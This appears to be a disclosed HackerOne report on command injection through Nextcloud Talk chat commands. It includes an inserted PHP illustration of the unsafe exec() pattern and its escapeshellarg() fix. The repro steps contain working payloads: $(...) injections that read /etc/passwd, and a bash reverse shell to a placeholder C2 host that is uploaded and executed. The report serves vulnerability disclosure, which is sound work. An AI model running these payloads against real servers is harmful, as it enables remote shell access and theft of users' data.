HackerOne report H1:851807

Nextcloud: Code injection possible with malformed Nextcloud Talk chat commands

2020-04-16 20:44:33
covert-spectre
hackerone.com

EPSS: 0.001 (Low), percentile 46.0%

Summary

The Nextcloud Talk app allows system administrators to set up chat commands that can be executed in Talk using the “/command” syntax. Users can provide additional arguments to the commands, such as “/calc 1+1” or “/wiki Hello”, which are passed to the underlying script using @exec. If arguments are accepted, it is possible to trigger arbitrary code by wrapping the code in bash command-substitution syntax, e.g. /wiki test $(mycommand). This allows for arbitrary code execution, which an actor can use to spawn a reverse shell back from the remote machine.
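To make the root cause concrete, the following is an added illustration (not code from Nextcloud Talk) of the pattern the summary describes: the raw chat text is concatenated into a command line for exec(), so the shell performs command substitution before the backing script runs. The hardened form single-quotes each argument with escapeshellarg(), and a metacharacter check is shown as a second layer for logging or rejection. The script path and the input string are hypothetical placeholders constructed for the example.

```php
<?php
// Added illustration, not Nextcloud Talk code. Models "chat-command arguments
// concatenated into a shell command line for exec()" and the corresponding fix.
// COMMAND_SCRIPT is a hypothetical placeholder; $input is a constructed sample.
declare(strict_types=1);

const COMMAND_SCRIPT = '/opt/talk-commands/wiki.sh'; // hypothetical backing script

/** Vulnerable pattern: raw chat text becomes part of the command line, so the
 *  shell expands $(...), backticks, ';' and '|' before the script ever runs. */
function buildCommandUnsafe(string $userArgs): string
{
    return COMMAND_SCRIPT . ' ' . $userArgs;
}

/** Split the chat text into separate argv entries and single-quote each one.
 *  escapeshellarg() wraps the value in single quotes and escapes embedded quotes,
 *  so every character reaches the script literally. */
function quoteArgs(string $userArgs): string
{
    $parts = preg_split('/\s+/', trim($userArgs), -1, PREG_SPLIT_NO_EMPTY);
    return implode(' ', array_map('escapeshellarg', $parts));
}

/** Hardened pattern: same command, but with every argument quoted. */
function buildCommandSafe(string $userArgs): string
{
    return COMMAND_SCRIPT . ' ' . quoteArgs($userArgs);
}

/** Defence in depth: flag arguments carrying shell metacharacters so the caller
 *  can log or reject them even if a backing script is changed later. */
function hasShellMetacharacters(string $userArgs): bool
{
    return preg_match('/[$`;|&<>(){}\\\\\'"\n]/', $userArgs) === 1;
}

// Constructed sample input with the argument shape from the report.
$input = 'test $(id)';

echo 'unsafe command line:    ' . buildCommandUnsafe($input) . PHP_EOL;
echo 'safe command line:      ' . buildCommandSafe($input) . PHP_EOL;
echo 'metacharacters present: ' . (hasShellMetacharacters($input) ? 'yes' : 'no') . PHP_EOL;

// Show the effect at the shell without invoking the hypothetical script:
// /bin/echo prints its argv, so expanded versus literal text is visible directly.
exec('/bin/echo ' . $input, $unsafeOut);            // shell substitutes $(id) first
exec('/bin/echo ' . quoteArgs($input), $safeOut);   // "$(id)" arrives as literal text
echo 'unsafe exec output: ' . implode(' ', $unsafeOut) . PHP_EOL;
echo 'safe exec output:   ' . implode(' ', $safeOut) . PHP_EOL;
```

Running the script side by side shows the difference: in the unsafe form the shell has already replaced $(id) with its output by the time /bin/echo receives its arguments, while in the quoted form the text is printed unchanged. Quoting fixes the injection; the metacharacter check only adds visibility and should not be relied on alone.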

Links

Severity

This bug has been filed with a severity of Critical, in line with the bounty impact/definition chart and the Nextcloud Threat Model, as the bug allows both remote code execution by a non-admin user and access to the complete user data of any other user.

Affected Versions

All versions that support Talk Commands appear to be affected, as the bug is in the @exec call.
The following versions were tested:

  • master-2020-04-15 via snap install nextcloud --edge, occ.status versionstring: 19.0.0 beta 2
  • 17.0.5snap1 via snap install nextcloud, occ.status versionstring: 17.0.5

Repro Steps

  1. Install and Setup Nextcloud

    1. create Ubuntu 18.04 VM
    2. install Nextcloud Server (Nextcloud Hub snap used for this test snap install nextcloud --edge)
    3. run install command: nextcloud.manual-install "admin" "password"
    4. generate self signed certificate nextcloud.enable-https self-signed
    5. set trusted domains nextcloud.occ config:system:set trusted_domains 1 --value=<domain/ip>
    6. create user alice
    7. install and enable spreed/talk app
    8. enable sample talk commands nextcloud.occ talk:command:add-samples
    9. add calculator command as described in the documentation here
  2. Setup C2 VM

    1. kali used for this test, can be any host with netcat nc
    2. run nc listener nc -l -p 8888
  3. Create Shell Script > shell.sh
    > This script can be anything that gets executed and returns a shell
    > In this case, a simple reverse shell is initiated using bash interactive piping to /dev/tcp
    > A PHP web shell, Meterpreter binary, or any other executable could be uploaded here

    bash -i >& /dev/tcp/<c2-ip-here>/8888 0>&1 &
    
  4. Log In As Alice and Upload File

    1. upload the above shell.sh to the root directory of alice’s Nextcloud files
  5. With Alice, start a Talk Conversation

  6. Test Exploitability:
    > Note: all commands appear to get successfully executed; however, whether output is shown depends on the implementation of the backing script. For example, /wiki cannot show the results of cat /etc/passwd because the multiline output breaks the wiki script, but the calculator sample can show the output because it has an echo command in the script.

    /wiki test $(id)
    /wiki test $(pwd)
    /wiki test $(ls -al .)
    /calc test $(cat /etc/passwd)
    /calc test $(ls -al ../)
    
  7. Execute Reverse Shell

    1. Locate uploaded shell script
      1. For nextcloud snap, the data directory is defined here
      2. File locations are fixed; therefore, once the root directory is known, it is easy to derive the location of the script
      3. Can use /calc test $(ls ../) to explore directory structure
    2. Enable execution of the script
    3. Execute the script
    /wiki test $(chmod +x /var/snap/nextcloud/common/nextcloud/data/alice/files/shell.sh)
    /wiki test $(bash /var/snap/nextcloud/common/nextcloud/data/alice/files/shell.sh)
    
  8. Observe C2 Listener for Connection

  9. Run Commands via C2

    id 
    pwd
    cd /var/snap/nextcloud/common/nextcloud/data/admin/files
    ls -al
    occ status
    

Attachments

See attached screenshots

Impact

  • Complete access to all user files
  • Shell access to occ
  • Shell access to host machine - root access if Nextcloud is running as root
